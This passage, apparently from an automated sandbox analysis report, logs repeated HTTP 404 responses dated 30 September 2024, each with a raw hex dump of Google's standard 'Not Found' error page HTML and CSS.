31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:21 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:25 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 